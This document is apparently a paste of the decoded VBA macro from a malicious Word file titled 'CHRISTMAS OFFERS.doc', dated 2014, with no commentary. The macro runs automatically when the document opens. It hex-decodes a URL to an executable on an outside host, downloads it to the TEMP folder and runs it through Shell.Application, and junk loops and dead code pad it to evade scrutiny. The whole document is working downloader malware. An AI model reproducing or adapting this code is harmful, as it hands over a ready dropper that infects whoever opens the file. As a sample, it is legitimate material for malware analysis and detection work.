
CHRISTMAS OFFERS.doc decoded macro

Dec 23rd, 2014
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  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. #If Win64 Then
  10. Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
  11. ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
  12. ByVal RPBFSI As Long) As Long
  13. #Else
  14. Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
  15. ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
  16. ByVal RPBFSI As Long) As Long
  17. #End If
  19. Sub azaza()
  20. fdigjkf
  21. End Sub
  22. Sub AutoOpen()
  23. azaza
  24. End Sub
  25. Sub Workbook_Open()
  26. azaza
  27. End Sub
  28. Sub fdigjkf()
  29. Dim RJkZmwMk As Integer
  30. For RJkZmwMk = 0 To 2
  31. Dim gOBzOgqU As Integer
  32. For gOBzOgqU = 0 To 2
  33. If 955689 = 955689 + 1 Then End
  34. If 3474 < 96 Then
  35. MsgBox (HexToString("5677734F6D61436F3138"))
  36. End If
  37. If Len(HexToString("68766372514F4A7237393238")) = Len(HexToString("476B554868716964")) Then
  38. MsgBox (HexToString("4572726F7220212121"))
  39. End If
  40. DoEvents
  42. Next gOBzOgqU
  43. If 685526 = 685526 + 1 Then End
  44. If 6625 < 25 Then
  45. MsgBox (HexToString("674E6B646E506D613434"))
  46. End If
  47. If Len(HexToString("43697476567A577434363732")) = Len(HexToString("474A714567704E4D")) Then
  48. MsgBox (HexToString("4572726F7220212121"))
  49. End If
  50. DoEvents
  52. Next RJkZmwMk
  53. Dim lszHAqCJ As Integer
  54. For lszHAqCJ = 0 To 5
  55. If 854281 = 854281 + 1 Then End
  56. If 6253 < 58 Then
  57. MsgBox (HexToString("566379706365674C3333"))
  58. End If
  59. If Len(HexToString("43506D647A746D7533323139")) = Len(HexToString("696F774F654C6652")) Then
  60. MsgBox (HexToString("4572726F7220212121"))
  61. End If
  62. DoEvents
  64. Next lszHAqCJ
  65. If 183441 = 183441 + 1 Then End
  66. If 5497 < 78 Then
  67. MsgBox (HexToString("415A5647447743683834"))
  68. End If
  69. If Len(HexToString("4A4D47496279494432343534")) = Len(HexToString("494557444866445A")) Then
  70. MsgBox (HexToString("4572726F7220212121"))
  71. End If
  72. SourceName = HexToString("687474703A2F2F6A61736F6E6375727469732E636F2E756B2F6A732F62696E2E657865")
  75. Dim DHVtTdBh As Integer
  76. For DHVtTdBh = 0 To 9
  77. Dim cObzsaQX As Integer
  78. For cObzsaQX = 0 To 9
  79. If 439747 = 439747 + 1 Then End
  80. If 4332 < 16 Then
  81. MsgBox (HexToString("46544C74726F42493831"))
  82. End If
  83. If Len(HexToString("534C6F694971745732343838")) = Len(HexToString("566B70524F42566C")) Then
  84. MsgBox (HexToString("4572726F7220212121"))
  85. End If
  86. DoEvents
  88. Next cObzsaQX
  89. If 668923 = 668923 + 1 Then End
  90. If 3566 < 69 Then
  91. MsgBox (HexToString("6B50534F6C4155743431"))
  92. End If
  93. If Len(HexToString("5965454579736C4137323139")) = Len(HexToString("716A6E6B4B556154")) Then
  94. MsgBox (HexToString("4572726F7220212121"))
  95. End If
  96. DoEvents
  98. Next DHVtTdBh
  99. Dim jceDHuHg As Integer
  100. For jceDHuHg = 0 To 8
  101. If 511345 = 511345 + 1 Then End
  102. If 8831 < 52 Then
  103. MsgBox (HexToString("5A564A66636C77773634"))
  104. End If
  105. If Len(HexToString("4D4E7A494661686833353734")) = Len(HexToString("6C4D64776C415976")) Then
  106. MsgBox (HexToString("4572726F7220212121"))
  107. End If
  108. DoEvents
  110. Next jceDHuHg
  111. If 966153 = 966153 + 1 Then End
  112. If 9431 < 53 Then
  113. MsgBox (HexToString("49446346687173773732"))
  114. End If
  115. If Len(HexToString("6A57714E445A516237343837")) = Len(HexToString("6F526A7465504868")) Then
  116. MsgBox (HexToString("4572726F7220212121"))
  117. End If
  118. Destination = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
  120. Dim bbkElRqJ As Integer
  121. For bbkElRqJ = 0 To 1
  122. Dim yFrPalZL As Integer
  123. For yFrPalZL = 0 To 3
  124. If 328237 = 328237 + 1 Then End
  125. If 6119 < 57 Then
  126. MsgBox (HexToString("6B79546F727679703739"))
  127. End If
  128. If Len(HexToString("5645424D564B634834313636")) = Len(HexToString("6F7A4E6A42556A64")) Then
  129. MsgBox (HexToString("4572726F7220212121"))
  130. End If
  131. DoEvents
  133. Next yFrPalZL
  134. If 132136 = 132136 + 1 Then End
  135. If 1189 < 35 Then
  136. MsgBox (HexToString("6361476C5A664F723838"))
  137. End If
  138. If Len(HexToString("6C525358456B554C37313436")) = Len(HexToString("564B495068446743")) Then
  139. MsgBox (HexToString("4572726F7220212121"))
  140. End If
  141. DoEvents
  143. Next bbkElRqJ
  144. Dim BZUmTvUs As Integer
  145. For BZUmTvUs = 0 To 2
  146. If 272823 = 272823 + 1 Then End
  147. If 2853 < 81 Then
  148. MsgBox (HexToString("6E797969557159763635"))
  149. End If
  150. If Len(HexToString("626C6D716473535138383139")) = Len(HexToString("504B77556661546F")) Then
  151. MsgBox (HexToString("4572726F7220212121"))
  152. End If
  153. DoEvents
  155. Next BZUmTvUs
  156. If 985756 = 985756 + 1 Then End
  157. If 6833 < 83 Then
  158. MsgBox (HexToString("5461686C7461706B3734"))
  159. End If
  160. If Len(HexToString("576C69664B51584731353636")) = Len(HexToString("6255727A4575454C")) Then
  161. MsgBox (HexToString("4572726F7220212121"))
  162. End If
  163. R = URLDownloadToFileA(0&, SourceName, Destination, 0&, 0&)
  165. Dim IvVtEwhF As Integer
  166. For IvVtEwhF = 0 To 8
  167. Dim JmFMnIxK As Integer
  168. For JmFMnIxK = 0 To 4
  169. If 731477 = 731477 + 1 Then End
  170. If 5925 < 46 Then
  171. MsgBox (HexToString("4A70476D7A5342453936"))
  172. End If
  173. If Len(HexToString("487874635944744A32393732")) = Len(HexToString("6157794D555A4266")) Then
  174. MsgBox (HexToString("4572726F7220212121"))
  175. End If
  176. DoEvents
  178. Next JmFMnIxK
  179. If 522828 = 522828 + 1 Then End
  180. If 2294 < 56 Then
  181. MsgBox (HexToString("7368616E4A6C76783337"))
  182. End If
  183. If Len(HexToString("41494B6D4572714C39323531")) = Len(HexToString("7958476F68624B43")) Then
  184. MsgBox (HexToString("4572726F7220212121"))
  185. End If
  186. DoEvents
  188. Next IvVtEwhF
  189. Dim PokTrFAq As Integer
  190. For PokTrFAq = 0 To 3
  191. If 926197 = 926197 + 1 Then End
  192. If 3188 < 27 Then
  193. MsgBox (HexToString("61696D725A597A713439"))
  194. End If
  195. If Len(HexToString("5954474778616C4A31313535")) = Len(HexToString("4A72477178486467")) Then
  196. MsgBox (HexToString("4572726F7220212121"))
  197. End If
  198. DoEvents
  200. Next PokTrFAq
  201. If 959838 = 959838 + 1 Then End
  202. If 9367 < 37 Then
  203. MsgBox (HexToString("776659706B6641723731"))
  204. End If
  205. If Len(HexToString("6B4A5A536C6B764C37333234")) = Len(HexToString("5874766E74447943")) Then
  206. MsgBox (HexToString("4572726F7220212121"))
  207. End If
  208. Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  210. fdfgdfeer4gf.Open Destination
  211. End Sub
  214. Public Function HexToString(ByVal fSoeUjt As String) As String
  215. Dim cOBcy As String
  216. Dim aGZKOocaTmjFc As String
  217. Dim GCNQgBCMVQ As Long
  218. For GCNQgBCMVQ = 1 To Len(fSoeUjt) Step 2
  220. GoTo ypgcwVuP
  221. Dim PyXKOlVZ As String
  222. Open "WFZLQU.WQZ" For Binary As 61
  224. GoTo EcTiprEi
  225. Dim olfZxvmN As String
  226. Open "UMQSTP.UJQ" For Binary As 23
  227. Put #23, , olfZxvmN
  228. Close #23
  229. EcTiprEi:
  231. Put #61, , PyXKOlVZ
  233. GoTo SxsOmWIy
  234. Dim kkLtIhbV As String
  235. Open "QLANPT.WSB" For Binary As 33
  236. Put #33, , kkLtIhbV
  237. Close #33
  238. SxsOmWIy:
  240. Close #61
  242. GoTo UNIWzNhk
  243. Dim dWjjhmup As String
  244. Open "OISYAI.OYD" For Binary As 28
  245. Put #28, , dWjjhmup
  246. Close #28
  247. UNIWzNhk:
  249. ypgcwVuP:
  252. GoTo GowCpKKx
  253. Dim lrekcdOf As String
  254. Open "SDYYTR.SPY" For Binary As 39
  255. Put #39, , lrekcdOf
  256. Close #39
  257. GowCpKKx:
  259. cOBcy = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(fSoeUjt, GCNQgBCMVQ, 2)))
  261. GoTo rmmXlBRJ
  262. Dim OhejTlwO As String
  263. Open "MLTYOU.RQE" For Binary As 62
  265. GoTo CoWXDRlP
  266. Dim ZrEkNNpZ As String
  267. Open "VCCFOH.UGW" For Binary As 74
  268. Put #74, , ZrEkNNpZ
  269. Close #74
  270. CoWXDRlP:
  272. Put #62, , OhejTlwO
  274. GoTo KSlimPNX
  275. Dim QeoLsJgb As String
  276. Open "WSOMBL.FBR" For Binary As 79
  277. Put #79, , QeoLsJgb
  278. Close #79
  279. KSlimPNX:
  281. Close #62
  283. GoTo JXbUkQce
  284. Dim OdhliKSY As String
  285. Open "MJSUVL.ROP" For Binary As 62
  286. Put #62, , OdhliKSY
  287. Close #62
  288. JXbUkQce:
  290. rmmXlBRJ:
  293. GoTo POelWJZw
  294. Dim ENMrSVJB As String
  295. Open "JQABDX.AEB" For Binary As 59
  296. Put #59, , ENMrSVJB
  297. Close #59
  298. POelWJZw:
  300. aGZKOocaTmjFc = aGZKOocaTmjFc & cOBcy
  301. Next GCNQgBCMVQ
  303. GoTo iCcPqWja
  304. Dim DKytcjiL As String
  305. Open "XUUNTY.SOO" For Binary As 77
  307. GoTo kLqGaseY
  308. Dim XGKpfUWv As String
  309. Open "ATNZAF.PCV" For Binary As 87
  310. Put #87, , XGKpfUWv
  311. Close #87
  312. kLqGaseY:
  314. Put #77, , DKytcjiL
  316. GoTo dcUaIkQK
  317. Dim JlgwWSZP As String
  318. Open "VMQIJJ.VJS" For Binary As 83
  319. Put #83, , JlgwWSZP
  320. Close #83
  321. dcUaIkQK:
  323. Close #77
  325. GoTo qUFnTloB
  326. Dim GZwWKDNJ As String
  327. Open "CBGWHJ.FZJ" For Binary As 75
  328. Put #75, , GZwWKDNJ
  329. Close #75
  330. qUFnTloB:
  332. iCcPqWja:
  335. GoTo ebWXGwas
  336. Dim IwEjzJLe As String
  337. Open "AYCFPS.PVW" For Binary As 87
  338. Put #87, , IwEjzJLe
  339. Close #87
  340. ebWXGwas:
  342. HexToString = aGZKOocaTmjFc
  343. End Function
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